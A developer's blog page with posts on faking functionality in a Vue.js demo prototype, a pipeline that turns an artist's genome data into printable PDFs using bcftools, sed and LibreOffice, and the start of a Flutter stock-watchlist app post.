From idea to prototype overnight: A Vue.js Post-Mortem
Sat, 06 Jun 2020


Preamble

This post tells the story of the lessons I learned when I prototyped a web app overnight to improve the workflow of engineers at a Fortune 500 company: what went right, what went wrong, and what I would do differently next time.

person standing on wrecked plane

What the project was about

A good friend of mine approached me and asked whether I could help improve the situation at their workplace. I asked for more details and found out that their employer suffers from what I succinctly call "departmentalization-induced data dispersion".

This seems to be an inevitable pain of growing bigger and losing track of data scattered across, or even within, departments. Employees need different documents, reports, Excel sheets, PDFs, manuals / books, the company intranet, etc.

Who doesn't love sending different revisions of a file back and forth via email? Fun for the whole family! :)

People with decision-making power often overlook the pains of the engineers who have to waste thousands of dollars' worth of time hunting for information to do their jobs. We are talking about highly qualified, well-paid engineers and managers; invite a team to a meeting that could have been an email and congratulations, that just cost you a couple thousand bucks.

I love improving and/or automating tedious tasks, so I set out to help and built a prototype overnight.

The Problem

My friend needs to manually hunt for documents, reports, sheets, etc. to retrieve information about different hardware parts. This can get rather complicated and time-intensive because there can be nuanced differences between the same part depending on where it was manufactured. Private company research papers by different researchers need to be found, consulted and referenced, which can take a considerable amount of time.

The Solution

A centralized, searchable and shareable information hub to quickly filter through lots of data points. Additionally, it should leave the option open for future customization in terms of automating tasks, for example automatically pulling quotes from and citing private research papers.

My approach

As a programmer I immediately thought about the architecture. How does everything fit together, how do the systems work with each other, how would I expand the functionality, how would the site be hosted, how would I maintain quality and correctness of data, etc. etc. etc.

But then I caught myself and remembered a good presentation by Jake Knapp, which I highly recommend!

  • I do not need to fully build out the idea.
  • Properly planning the project out (at this point) is unnecessary.
  • We are just interested in getting feedback about the proposition. That's key.

Anybody who has worked with a huge client has most likely experienced the dread of writing emails for weeks if not months, ughhh. Things move slowly in the enterprise world. Before anything happens, several approvals are needed, somebody somewhere needs to get that email again, decisions get postponed, and yada, yada, yada.


It's simply not worth it to put in the time for a project of this size before you get approval in writing.


We as engineers love the technical details and inner workings of things, but a person responsible for allocating budgets is most likely just interested in:

  • How does this help?
  • What does it look like?
  • How much does this cost?
  • How long will this take?

All of these points can be answered without a properly working MVP, which means that the more time-efficient way of handling this opportunity, or rather this proposal, is: faking it until you sign the deal.

What does "Faking it" mean

Let me quickly elaborate on what "faking something" means in a tech context, because people outside of tech often have a negative view of the expression.

So for this project, let's say you have a device, be it a laptop or phone, and you want to retrieve a list of available hardware parts. In a real environment it would look like this:

daniel biegler client to server communication example

The device requests data through the internet or intranet from somewhere else, e.g. a database on a server.

Now, if you genuinely wanted to make this happen, you would need to worry about the reachability of the server, credentials, security, error messages, managing the data itself and all the things I omitted just now. None of this is impossible, of course, but it costs time. Unnecessary time.

To avoid all of this, we can simply include the needed data beforehand and just pretend that we're fetching it from somewhere else. From an outside view, these two methods will look exactly the same:

Real

  1. Start loading animation
  2. Request data
  3. Receive data
  4. End Loading animation
  5. Use data

Fake

  1. Start loading animation
  2. Wait one second
  3. End loading animation
  4. Use data
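
In code, the "fake" path can be as small as a helper that resolves bundled sample data after a short delay. Here's a minimal sketch; the function and the sample data are illustrative, not taken from the actual prototype:

// Pretend to fetch parts from a server, but resolve bundled sample data
// after a one-second delay so the loading animation has something to show.
const SAMPLE_PARTS = [
  { id: 1, name: 'Example part A' },
  { id: 2, name: 'Example part B' },
];

function fakeFetchParts() {
  return new Promise((resolve) => {
    setTimeout(() => resolve(SAMPLE_PARTS), 1000);
  });
}

Swapping in the real thing later means replacing only this helper with an actual network request; the calling code stays the same.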

Not only does this save time, it also reduces the possible points of failure during a presentation.

Imagine trying to sell your product and failing right in front of your client. Yikes. Germans have a succinct word for it, "Vorführeffekt", which translates to "presentation effect" and describes the situation where you tried something and made sure it works, but as soon as you present it to someone, it simply fails.

So, "faking it" is not bad in this context. It both saves you time and reduces things you need to worry about. After signing the deal, depending on how careful you were, you 'just' need to replace the code where you send and receive data.

My Prototype

1. Login

A Login-Page is a must. The service would, of course, need to be gated and controlled.

daniel biegler busair login

Now comes the first "fake-feature". How do you implement a Login that needs to look like it works?

You have a boolean variable isLoggedIn which indicates whether or not the user is logged in. The input fields do nothing. The Login-Button simply sets the variable to true.


Yea.. ¯\_(ツ)_/¯
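
For completeness, here's a minimal sketch of what that could look like; the names are illustrative, not the prototype's actual code:

// The input fields are bound to plain data properties that nobody checks.
// The Login-Button calls login(), which just flips the flag.
new Vue({
  el: '#app',
  data: {
    isLoggedIn: false,
    username: '',
    password: ''
  },
  methods: {
    login: function() {
      // No request, no validation - just pretend it worked.
      this.isLoggedIn = true;
    }
  }
});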


The purpose of the Login-Page was not to (directly) sell the prototype. I wanted it to set the mood for the first impression and hopefully intrigue the viewers as to what's behind the auth-wall. I had hoped that the Login-Page would function as an introduction of sorts, evoking a feeling of "alright, this proposal isn't just a loose page that someone threw together, this is a proper usable thing".

2. Search

After you successfully log in, you are shown the meat of the project: the Search-Page. Originally the advanced search drawer would be closed, but for this post I screenshotted it open so that you can see everything in one image.

daniel biegler busair search empty

I think the interface is pretty self-explanatory. You can type in a query, potentially apply some filters and hit the Search-Button. This isn't rocket science.

What I'd like to emphasize, though, is that it's important to create the experience of your thing working. What would it look like when we search for something?

It looks pretty realistic and smooth, eh? Of course you can't properly implement a working solution overnight, but what you can implement is the experience of how it would look and feel. Remember, we were just interested in receiving feedback.

// The Search function simply
// updates the loading-bar and
// sets up the table entries after a delay.
search: function() {
  this.searchProgress = 0.1;

  // Wait for 200ms => 25% Progress
  setTimeout(() => {
    this.searchProgress = 25;
  }, 200);

  // Wait for 1s => 100% Progress
  setTimeout(() => {
    this.searchProgress = 100;

    // Wait for 500ms => Reset & Update the table
    setTimeout(() => {
      this.searchProgress = 0;
      this.tableEntries = generateRandomTableEntries();
    }, 500);

  }, 1000);

}
<!-- We only show the progress bar if 
the progress is greater than zero. -->
<div class="progress ..."
  v-if="searchProgress > 0"
>
  <div class="progress-bar progress-bar-striped ..."
    :style="{ width: searchProgress + '%' }"
  >
    <!-- See how we calculate the width.
    It's just the progress as a percentage.
    25 equals 25% in width. Really simple.
    For this example I omitted other attributes. -->
  </div>
</div>

Just wait a little and update values. No networking, no data validation, no errors. Keep it simple, stupid.

You can click on the table entries which take you to their profile page.

3. Part Profile

These are a key feature: they enable colleagues to share the URLs, via email for example. These would be important reference points for users to come back to from time to time. They are a hub with all the information and functions you might need.

daniel biegler busair part profile

Here you can very easily provide additional value through (future) functionality. New fields, new buttons, automation for tedious tasks.

How the presentations went

With the experience now "working", the prototype was ready to be presented to the first round of people: Colleagues and the manager.

The presentation went smoothly and got lots of praise: for the design, the ease of use and the potential it shows. The engineers and, more importantly, the manager were immediately on board and wanted to escalate the proposal to the decision-makers, namely the people who have power over budget assignments.

That took a while, because.. enterprise. Here's also an important lesson: wait for a contract before you celebrate. This is just business, don't take it personally. Talk is very cheap and easy; in 99% of cases it isn't even meant to be misleading. Things just don't work out, it genuinely happens. As with this project.

The engineers and the manager were all very interested and elevated the proposal. It got reviewed by the higher-ups and, again, received lots of praise. But then it was time to talk about allocating budget for the implementation, and this is where it sadly stopped. They simply weren't able to allot enough budget for this project. Maybe with different timing it could have turned out differently, but that doesn't matter now.

This obviously made me unhappy but this is just business. It wasn't personal and that's alright.

What would I do differently next time

This whole project happened a long time ago and I'm now much more experienced with Vue.js, so I'd make use of its ecosystem a lot more. Namely, I would use the awesome Vue Router, the Vuex Store and the Vue CLI.

At the point when I built this prototype, I needed to deliver as fast as possible and I wasn't too familiar with those things. I knew what they do and that I should use them in the long run, but I just stuck to what I was comfortable with in order to retain my development speed.

Now in hindsight, I would proceed like so:

  1. Use the Vue CLI to quickly set up the project. Include the Vue Router and Store in the setup step.
  2. Use the Vue Router in order to support different URLs and to be able to still contain the whole project in a single file.
  3. Use the Vuex Store in order to abstract the request/retrieval of data away.

    While this isn't technically needed for a simple demo like this, this approach would be a lot cleaner and would let you reuse more code if you need to expand upon the demo; see the sketch after this list.
  4. Contain everything in a single HTML File. Build the JS, the SCSS, convert images to Base64 and include all of them in a single file.
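
As a rough sketch of point 3, assuming Vue 2 with Vuex (the names are illustrative, not the original code), the store could own the search state and fake the request inside an action:

import Vue from 'vue';
import Vuex from 'vuex';

Vue.use(Vuex);

export default new Vuex.Store({
  state: {
    searchProgress: 0,
    tableEntries: []
  },
  mutations: {
    setProgress(state, value) { state.searchProgress = value; },
    setEntries(state, entries) { state.tableEntries = entries; }
  },
  actions: {
    // For the prototype this fakes the request, just like the search
    // function shown earlier. Swapping the body for a real fetch later
    // wouldn't touch the components at all.
    search({ commit }) {
      commit('setProgress', 25);
      setTimeout(() => {
        commit('setProgress', 100);
        setTimeout(() => {
          commit('setProgress', 0);
          commit('setEntries', generateRandomTableEntries());
        }, 500);
      }, 1000);
    }
  }
});

A component would then simply dispatch 'search' and render whatever is in the store.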

Vue Router would have saved me so much hassle. Did you wonder how I made the Part-Profile-Page for every part without a router? I created a Node.js script that generates parts

for (const part of parts) {

  for (const footprint of footprints) {

    for (const coating of coatings) {

      const item = {
        // I omitted lots of lines
        // for your viewing pleasure.
      };

      output.push(item);
    }

  }

}

then reads a Template-HTML that I created with a specific "marker"

new Vue({
  el: '#app',
  data: {
    profile: {}//REPLACEMEHEREPLS
  },

  // Etc.
});

and replaces the marker with the generated data. When that's done, it gets written to disk.

// The template path, the generated part data and the output file name
// are defined earlier in the script.
const replacedTemplateContent =
  fs.readFileSync(
    partProfileTemplatePath,
    { encoding: 'utf8' }
  )
  .replace('{}//REPLACEMEHEREPLS', partDataReplacement);

fs.writeFileSync(replacedTemplateName, replacedTemplateContent);

After all, necessity is the mother of invention, haha.

If there's enough interest, I could rebuild this project with my current knowledge and open source it. Let me know!

Conclusion

  1. If you're only interested in presenting something to decision-makers in order to get feedback, implementing a fully featured MVP is unnecessary. Save yourself a lot of time by "faking" functionality. Of course you should know how you'd expand on your prototype, but don't go out of your way and spend unnecessary time on implementation details. Create the experience of your thing working.

  2. The enterprise realm moves slowly. Decisions need time and nothing is certain as long as there aren't signed contracts. No contract, no champagne.

  3. Use what you're familiar with so that you can iterate as fast as possible. With my current knowledge I could have completed this project even faster and cleaner, but you're always going to be smarter in hindsight. Hindsight is good; let it improve the future you. Creating something that people can actually see and use has a lot more value than just plans, ideas or promises.

  4. Depending on who you are trying to impress, you should probably make it look pretty and polished; use the company colors and/or the design language. The first impression is worth a lot, and if you can induce the feeling of your product "fitting in", you're one step closer.

    My design got lots of praise and I believe that this contributed to how fast my proposal got elevated to the decision-makers.

  5. Make the prototype as easily shareable as possible. No setup! Remember: the fewer moving parts, the less can break, the better. At best you just have a single file. People will then be able to simply forward your whole thing via email. USB sticks are often forbidden in big corporations and/or sensitive work environments, and no decision-maker is interested in unpacking zip files.


Awesome photo by Stefan Stefancik from Pexels

Visualizing genome data, working with contemporary artist Davide Balula
Fri, 10 Jan 2020


Abstract

I worked together with the wonderful French artist Davide Balula to visualize his genome for an art exhibition.

I was responsible for preparing and processing the needed sequencing data and for coming up with a technique that allowed me to design and create PDF files spanning tens of thousands of pages.

Definitely check out his other works too; I personally was deeply fascinated by the mimed sculptures.

daniel biegler visualize dna 3d example

Contents

  1. How it all began
  2. The project idea
  3. Here come the problems 
  4. Original hypothesis
  5. Breakthrough
  6. First printing test
  7. Processing and assembling sequence data
  8. Processing pipeline step by step
  9. Conclusion

How it all began

Some time ago, fellow redditor charrcheese posted the following image where they made their computer "draw" DNA sequences.

User Charrcheese draw dna sequence reddit

I'm a real sucker for computer generated art. Naturally, I had to play around with this to create something of my own, so I went to the comment section and asked if the source code was available.

Long story short, I sat down and wrote this page to scratch this new itch of mine. You can change colors, and play around with different methods for "drawing" the sequences.

After all of this was over, I got contacted by contemporary artist Davide Balula.

The project idea

Davide imagined printing the DNA-sequences of his chromosomes in book form, potentially accompanying them with visualizations for his next exhibition in Paris. 

I knew from my own work with large amounts of data that this wouldn't be easy. Prior to Davide's message, I'd already looked up the Human Genome Project over at NCBI for a personal project of mine.

Here come the problems

If you've ever tried to open or copy/paste a file that's over a couple hundred mega- or gigabytes, you might have noticed that sometimes this happens:

itcrowd fire programming

Well, figuratively speaking of course.


Naturally this is not news and there are many programs (gedit, 010 Editor, ..) for viewing and editing huge files - but those didn't suit my needs.

In my case, I needed to be able to design the layout of the text for printing.

This is where huge files will get on your nerves. Word processors like LibreOffice, Word and Pages are simply not designed to support this much data.

They use too much RAM, take forever to load, eventually become unresponsive, and even if you manage to open something big, try switching the font size now.

Yeah, not gonna happen.

Original hypothesis

I have worked with LaTeX before and thought that I could easily design a page and \include my text. For those who don't know what I'm talking about, Wikipedia has your back:

LaTeX is a document preparation system. When writing, the writer uses plain text as opposed to the formatted text found in WYSIWYG ("what you see is what you get") word processors like Microsoft Word, LibreOffice Writer and Apple Pages.


In theory, this sounds exactly like what I need. I don't have the graphical overhead of the word processors and I can generate arbitrary documents.

I did some digging and found the seqsplit and dnaseq packages, which enable me to do what I need to do.

seqsplit – Split long sequences of characters in a neutral way

When one needs to type long sequences of letters (such as in base-sequences in genes) [...]

dnaseq – Format DNA base sequences

Defines a means of specifying sequences of bases. The bases may be numbered (per line) and you may specify that subsequences be coloured. [...]

Standard procedure, I thought - write your document, include the necessary packages, compile it - and then...

daniel biegler pdflatex full memory meme

LaTeX hugs your RAM very tightly and dies miserably.

Uggghh oh well, that sucks.

I did some research and found that luatex, unlike pdflatex, allocates memory dynamically (i.e. it doesn't crash with big input).

Me: "This is awesome."

Narrator: "It really wasn't."
daniel biegler lualatex processing time

The processing time, even for small amounts of data, is insane. That is a big no-no.


While lualatex technically works, it figuratively takes forever. I needed a better solution.

Stack Exchange had some useful comments which sounded great at first:

1. Use Enscript in conjunction with ps2pdf

Enscript
[...] converts ASCII files to PostScript [...] 
ps2pdf
[...] converts PostScript files to Portable Document Format (PDF) files.


2. Use text2pdf, Pandoc or unoconv, which all do similar things, except that this caught my attention:

unoconv
a command line tool to convert any document format that LibreOffice can import to any document format that LibreOffice can export

LibreOffice? Yeah.


3. Use LibreOffice

Wait. Didn't I rule out this Word processor?


I was trying out the different solutions and they didn't work like I wanted them to, so I kept scrolling and found out that LibreOffice itself supports operating without a graphical user interface!


Me: "This is awesome."

Narrator: "It was. Kinda."

First progress

LibreOffice has a very neat command line option for converting a file into a different format, in my case: PDF.

Usage is very easy:

$ libreoffice --convert-to pdf [your_file]


Here I timed the conversion of the 21st chromosome:

$ time libreoffice --convert-to pdf chromosome_21.fna
convert /tmp/chromosome_21.fna -> /tmp/chromosome_21.pdf using filter : writer_pdf_Export
  
libreoffice --convert-to pdf chromosome_21.fna
125.04s user
1.50s system
99% cpu
2:06.78 total


Only around 2 minutes for a 46MB file! That's what I'm talking about.

Here is the first page of the output PDF:

daniel biegler libreoffice pdf chromosome 21

The output PDF is 9897 pages long. Could be worse. Let's run a longer sequence:

$ time libreoffice --convert-to pdf chromosome_01.fna
convert /tmp/chromosome_01.fna -> /tmp/chromosome_01.pdf using filter : writer_pdf_Export
  
libreoffice --convert-to pdf chromosome_01.fna
2328.58s user
8.64s system
99% cpu
39:01.99 total

39 minutes for a 242MB file results in 52903 pages.

From a time-cost perspective, this is a huge win.

These PDFs will cost real money though, so ~63,000 pages for only 2 of the 24 chromosomes doesn't fly. The inner margins and the font size are way too generous.

I need to be able to change the layout, which unfortunately the libreoffice command does not directly support.

What it does support, however, is converting .odt files, its own document file format
(similar to .docx for Microsoft Word).

.odt files contain, besides the content itself, layout information! 

Breakthrough

Because I'd been watching videos by the excellent IT security engineer Gynvael Coldwind, I had learned quite a bit about the Zip file format, which led me to this thought process:

Create a test.odt document, containing:

daniel biegler libreoffice test odt before

Document formats are pretty much always just zip files, which you can extract.

$ unzip -l test.odt                                  
Archive:  test.odt
  Length      Date    Time    Name
---------  ---------- -----   ----
       39  2018-08-15 14:52   mimetype
      353  2018-08-15 14:52   Thumbnails/thumbnail.png
        0  2018-08-15 14:52   Configurations2/accelerator/
        0  2018-08-15 14:52   Configurations2/popupmenu/
        0  2018-08-15 14:52   Configurations2/toolpanel/
        0  2018-08-15 14:52   Configurations2/menubar/
        0  2018-08-15 14:52   Configurations2/images/Bitmaps/
        0  2018-08-15 14:52   Configurations2/toolbar/
        0  2018-08-15 14:52   Configurations2/floater/
        0  2018-08-15 14:52   Configurations2/statusbar/
        0  2018-08-15 14:52   Configurations2/progressbar/
     3532  2018-08-15 14:52   content.xml
      971  2018-08-15 14:52   meta.xml
      899  2018-08-15 14:52   manifest.rdf
    10834  2018-08-15 14:52   settings.xml
    11157  2018-08-15 14:52   styles.xml
      978  2018-08-15 14:52   META-INF/manifest.xml
---------                     -------
    28763                     17 files

I personally have never done this before, but content.xml sounds interesting.

Let's have a look:

<?xml version="1.0" encoding="UTF-8"?>

... many lines omitted
for your viewing pleasure ...

<text:sequence-decl 
text:display-outline-level="0" text:name="Illustration"/><text:sequence-decl text:display-outline-level="0" text:name="Table"/><text:sequence-decl 
text:display-outline-level="0" text:name="Text"/><text:sequence-decl text:display-outline-level="0" text:name="Drawing"/></text:sequence-decls><text:p 
text:style-name="P1">Test</text:p><text:p text:style-name="P1"/><text:p 
text:style-name="P2">danielbiegler.de</text:p></office:text></office:body></office:document-content>

Aha!

There at the very bottom are our test strings. How about we change Test to does this work?

...
<text:p text:style-name="P1">does this work?</text:p><text:p text:style-name="P1"/><text:p 
text:style-name="P2">danielbiegler.de</text:p></office:text></office:body></office:document-content>

Re-zip the content.xml into our test.odt:

$ zip test.odt content.xml 
updating: content.xml
	zip warning: Local Entry CRC does not match CD: content.xml
 (deflated 75%)

And finally, try to open it:

daniel biegler libreoffice test odt after

Yes, it works.

This opens up the whole layout-power of the word processor without needing to open the large sequence data.

Bottleneck

While researching all of this, I was wondering why the processing takes so unbelievably long, and it turns out that line breaks and word wrapping play a huge role. Here are some stats for y'all:

daniel biegler libreoffice odt conversion crop

Here you can see that in the beginning, text with line breaks (orange) has a small advantage over text without line breaks (blue).

But what happens when we increase the character count, given that our data is much bigger than a couple hundred thousand characters?

daniel biegler libreoffice odt conversion

Whoopsie daisy.

Now that is pretty much the definition of a bottleneck, oh my..

Our data is a lot larger than a million characters, which means that to compile all the PDFs in a reasonable amount of time, line breaks are mandatory.

Font Kerning

In typography, kerning is the process of adjusting the spacing between characters in a proportional font, usually to achieve a visually pleasing result.

Font Kerning Example

Theoretically, in our case, kerning would be useful to condense the sequence a bit more, saving paper.

However, this comes with the tradeoff that some lines in the book take up more space than others. Some lines won't reach the end of the page, whereas some lines will need to wrap.

daniel biegler kerning example proportional font

Remember, wrapping is bad - real bad.


To properly set the line breaks ourselves, for higher performance, we'd need to calculate each line's length, and at that point we'd just be doing what the word processor does anyway.

To solve this, we can simply use a monospaced font, i.e. a font with fixed spacing. Example:

Proportional vs monospace v4

With this, we know beforehand how many characters fit on a single line. This allows us to optimally set line breaks! See here:

daniel biegler kerning example

First printing test

For now it was important to figure out how small you can make the font while still having legible text. Here is an example of an earlier test Davide made:

daniel biegler davide balula holding dna pdf

The answer is around 4pt for the font size. As you can see, there's still very generous padding. We'll fix that later.

Now comes a little rant, stay strong. You'll get rewarded with the technical details afterwards!

Processing and assembling sequence data

Not gonna lie, this step was infuriating and frustrating, to say the very least.

I do not have a background in bioinformatics, but I consider myself capable of learning new things quickly and adapting to new situations quite easily. This step involves using software, so as a developer I thought: how hard can that be?

Writing software taught me to navigate in muddy areas; I assess and filter information quickly to achieve what I want.

Oh my sweet summer child.. sigh

As software devs we have the luxury of huge communities where pretty much every day-to-day topic can be found quickly and concisely. In the vast majority of cases you have a problem that somebody else has already encountered and fixed. This leads to very easily searchable answers.

But let's say you begin to dabble with very specific equipment and/or very specific functionality. At some point it gets harder and harder to find useful information because the target audience shrinks drastically. It sounds a bit counterintuitive, because having something specific should enable you to find specific things, right?

The number of relevant search results is already drastically reduced, but now you also have to find the specific wording of the question or discussion, otherwise the relevant result will be buried under junk. Think about the last time you needed to visit the second or third page of a Google search. For me personally it's so rare that I genuinely do not remember, at all. I only remember being thoroughly disappointed every time because the results get extremely irrelevant really quickly.

Combine this with being absolutely new to, and ignorant of, a highly specific and complicated area of higher studies. The information starts to feel like reading Mandarin Chinese as a foreigner (me).

Just as an example for this article, I randomly clicked a question on Biostars (a bioinformatics forum), and one answer reads like this, and I quote:

"We need to calculate the probability of three independent events happened together. The event is the choice of the genotype at the locus (SNP). The probability is estimated by the genotype frequency. Assuming the Hardy-Weinberg equilibrium is true, the frequency of genotype is p^2 for homozygous and 2pq for heterozygous genotypes, where p and q are the allele frequencies. Therefore, the frequency of AA-CC-AG profile would be" ...

Uhhh, yeah..

People who understood that paragraph probably cringe at me quoting this, but reading text where you only understand 50% of the words is an incredibly humbling experience. You should give it a try.

I knew it wouldn't be easy to digest all the info so I took my time to research different terminology and abbreviations, step by step, trying to inch forward.

After the lab got done processing and shipping the data to us, I began investigating how to proceed with the data I had. The goal was to generate sequences, in FASTA format, for chromosomes 1 through 22, X and Y.

I'm not going to detail every method that I tried, but what's important is that after some time I figured out that what I wanted to produce is called a "consensus sequence".

There's a set of utilities, called SAMtools, that you can use to work with DNA sequence data. 

After trying out a myriad of things and fixing several errors along the way, I was still left with a message telling me the following:

[E::faidx_adjust_position] The sequence "chrM" was not found

Uhh, the what now? At this point I had poured many hours into this whole ordeal and got scared that maybe the whole thing simply would not work.

But again, continuous trials, errors and coffee led me, for some reason, down the path of inspecting the header information of the BAM file.

$ samtools view -H data.bam

It featured some output that I was not interested in.. except that at the very end a particular directory caught my eye.

/...
└─ DNA/
   └─ DNA_Human_WES/
      └─ DNA_Human_WES_2016b/
         └─ Database/
            └─ hg19/
               └─ fa/
                  └─ hg19.fasta

Some gears in my head started churning and it struck me like lightning. I had seen hg19 before!

I was really lucky not to have missed this detail, because in reality, when I checked the headers, it looked like this:

daniel biegler bam view header paths

I mean, just look at it.

I felt such a big relief when I accidentally spotted that.

When I first started playing with human sequences I found out you can download two different reference assemblies from NCBI: GRCh37 and GRCh38. Right now, while writing this, I can't even recall why I knew what hg19 meant, but I specifically remembered that hg19 is kind of a "synonym" for GRCh37 and NOT GRCh38.

I had been trying to generate the consensus sequence with the GRCh38 assembly instead of the hg19 one. This was finally the breakthrough that I so desperately needed.

The last error I got was because of chrM (mitochondrial DNA), which I found out is "new" notation that wasn't used when hg19 was created (plus some additional differences).

With that roadblock finally out of the way, I could create some PDFs.

Processing pipeline step by step

A little heads-up:
This part is very technical and if you don't care about the specifics you can skip ahead to the conclusion.

Since I had encountered quite a few problems, I compiled bcftools myself to get the newest possible version. You can get the source very conveniently from GitHub.

After compilation, run and check the version via

$ ./bcftools --version
bcftools 1.9-210-gf1f261b
Using htslib 1.9-279-g49058f4
Copyright (C) 2018 Genome Research Ltd.
License Expat: The MIT/Expat license
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Alright seems to work.

In order to create the consensus sequence, we first need to call the variants.

This means we identify variants from the sequence data, i.e. positions where the aligned reads differ from the reference genome, and write them to a VCF file.

Here are the commands:

$ bcftools mpileup -Ou -f ref.fa input.bam | bcftools call -Ou -mv | bcftools norm -f ref.fa -Oz -o calls.vcf.gz

This takes quite a while and produces the compressed .vcf file that we need for the consensus sequence. Like I said earlier, make sure you have the proper reference!

So now we are able to construct the consensus sequence via:

$ bcftools consensus -f reference.fa calls.vcf.gz > consensus.fa
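
Depending on your setup, bcftools may also want the compressed VCF indexed before it builds the consensus; if it complains about a missing index, run:

$ bcftools index calls.vcf.gz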

This was a big first step. Next we need to massage the data into the shape we need.


Massaging in this context means:

  1. Cut a chromosome out of the consensus sequence
  2. Remove comments and unneeded symbols
  3. Fold the lines to a fixed length so we avoid line breaks (remember: performance!)
  4. Add some markup so we can insert the sequence data into the LibreOffice document

1. Find out where the different chromosomes start and end so that you can carve them out of the consensus sequence.

Take a look at the first three lines of the consensus sequence:

$ head -n 3 consensus.fa
>chr1
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

All the sections are preceded by a comment featuring the greater-than character.

This makes it trivial to get the start plus the line number of every section via grep!

$ cat consensus.fa | grep --line-number "^>" | head -n 25 > comment_lines.txt

That output looks like this:

1:>chr1
4153951:>chr2
8207074:>chr3
11507294:>chr4
# ... and so forth

This enables us to precisely cut out each individual chromosome via stream editors like sed or awk. I used sed for this one.

For example, the following means we want to output the lines from number 1 to 4153951 (inclusive), then quit execution when we reach line 4153952. The quitting is just a little performance trick to speed up processing for large files.

$ sed -n "1,4153951p;4153952q" consensus.fa

We just cut out the first chromosome - easy!

2. Remove comments and unneeded symbols

On our mission to reduce the output size, Davide and I decided to strip unknown DNA bases from the output. Also, since the ranges from sed are inclusive, we need to omit the comment lines. (We could have done that in the previous step but it really doesn't matter.)

The following means we want to omit all lines starting with a greater-than character i.e. all the comment lines.

$ grep -v '^>'

We follow this up with the handy tr for deleting some unneeded symbols, namely the newline, N and n characters:

$ tr -d '\nNn'

3. Fold the lines to a fixed length so we avoid line breaks

Getting rid of the line breaks for LibreOffice is of the essence; luckily there's the fold command which lets us specify how long each line should be!

The following means we want each line to be 123 characters wide:

$ fold -w 123

4. Add some markup so we can insert the sequence data into the LibreOffice document

We need to insert the sequence data into a LibreOffice document file, because that is how we are going to convert to PDF. Remember from earlier, this is what the text looks like inside the document file:

...
<text:p text:style-name="P1">
does this work?</text:p><text:p text:style-name="P1"/>
<text:p text:style-name="P2">
danielbiegler.de</text:p></office:text></office:body></office:document-content>

So we need to prepend

<text:p text:style-name="P2">
and append
</text:p>
to every single line of the sequence. That way LibreOffice knows which style (font size, font family, etc.) to apply to each line.

That's super easy with sed:

$ sed 's/^/<text:p text:style-name="P2">/' | sed 's/$/<\/text:p>/'

And now everything, properly in order, inside a little helper script:

#!/bin/bash
if [ $# -lt 5 ]; then
	echo "You need 5 arguments: start_line, end_line, /path/genome.fna, fold-width, /path/output"
	exit 1
fi

# $1: Start line, inclusive
# $2: End line, inclusive
# $3: Path to the DNA Data in fasta file format
# $4: Fold width to properly fit the page
# $5: Path to output content file

# cut out section				# ignore comments # rm stuff  # fold it	   # beginning of the line					  # end of the line		# write to file
sed -n "$1,$2p;$(($2+1))q" $3 | grep -v '^>' | tr -d '\nNn' | fold -w $4 | sed 's/^/<text:p text:style-name="P2">/' | sed 's/$/<\/text:p>/' > $5

Now it is super convenient to prepare our data for further processing; Here's how to prepare the first chromosome:

$ ./prepare_lines.sh 1 4153951 consensus.fa 123 chr1_prepared.xml

Easy as pie!

Writing another helper script that generates all of the chromosomes is highly recommended, because the data needs to be regenerated whenever the style of the document changes:

#!/bin/bash
./prepare_lines.sh   1         4153951     consensus.fa 123 chr1_prepared.xml
./prepare_lines.sh   4153951   8207074     consensus.fa 123 chr2_prepared.xml
./prepare_lines.sh   8207074   11507294    consensus.fa 123 chr3_prepared.xml
# ... and so forth ...

After preparing all the chromosomes we are finally in a position to create some PDFs!

Remember from earlier:

  1. Retrieve the content.xml from our master.odt
  2. Insert the sequence into the content.xml file
  3. Rezip the content.xml into a document
  4. Convert the document to PDF

1. Retrieve the content.xml from our master.odt

We know that we can simply unzip the master.odt file since we already experimented with that earlier, but what I found out is that you can unzip to stdout with the -p option! That way we don't need to store a temporary file. Neat.

# unpack to stdout
$ unzip -p master.odt content.xml

2. Insert the sequence into the content.xml file

This step is a little tricky. We use a regular expression to replace every line of text inside the document with a single REPLACEME. After that, we replace that REPLACEME with the file contents of our prepared text. This allowed for easier visual sanity checks while I developed the script.

# replace text with REPLACEME on separate line
| perl -p -e 's/<text:p.*?(?=<\/o)/\nREPLACEME\n/'
# replace with file contents
| sed -e "/REPLACEME/{r chr1_prepared.xml" -e 'd}' > content.xml

3. Rezip the content.xml into a document

Now we have a content.xml file that holds our prepared sequence. Simply rezip it into a document.

Since I wanted to preserve the master.odt, I decided to make a temporary copy of it and zip the new content into that one instead.

So first make a copy

$ cp master.odt temp_doc.odt

And now zip our prepared content into that:

$ zip temp_doc.odt content.xml

4. Convert the document to PDF

At this point we have a fully featured and complete document at temp_doc.odt, which we can convert to PDF using

$ libreoffice --convert-to "pdf" temp_doc.odt

I put these steps into a helper script, which looks like this:

#!/bin/bash

# 1. /path/master.odt
# 2. /path/sequence_content.txt
# 3. /path/output.odt
if [ $# -lt 3 ]; then
	echo "You need 3 arguments: /path/master.odt, /path/sequence_content.txt, /path/output.odt"
	exit 1
fi

echo "Creating content.xml"
# unpack to stdout			# replace text with REPLACEME on separate line     # replace with file contents
unzip -p $1 content.xml |	perl -p -e 's/<text:p.*?(?=<\/o)/\nREPLACEME\n/' | sed -e "/REPLACEME/{r $2" -e 'd}' > content.xml

echo "Copying $1 to $3"
cp $1 $3

echo "Adding content.xml to $3"
zip $3 content.xml

echo "Remove content.xml"
rm content.xml

echo "Creating PDF. This can take a while"
time libreoffice --convert-to "pdf" $3

echo "Remove $3"
rm $3

Here's how the current version looks for the Y chromosome. Note the repeating patterns in our DNA:

daniel biegler dna book example

This post will be updated at a later time. Hopefully we can add some graphical visualisations using my site and hold the actual books in our hands! :)

Conclusion

This project taught me that in order to achieve your goal you have to persevere and iteratively improve. A good solution doesn't get good on the first try; step-by-step fine-tuning is key. Getting from ~53,000 pages down to ~5,000 was the sum of many individual improvements.

Patience is another big thing. I wish I could show you how frustrated I felt with all the bioinformatics mess, oh boy. Trying to stay cool headed in a constantly frustrating environment is a damn life lesson if I've ever seen one.

Thanks for your time, I hope you enjoyed this. Let me know.

Writing my own Stock-Watchlist App in Flutter - Minimum Viable Experiment
Fri, 27 Sep 2019

I've been wanting to write an app for my phone since forever, before I even had a smartphone in fact, and lately the note has been hanging on my whiteboard, looking at me judgingly.

This month (2019-09) I made this long-held dream a reality.

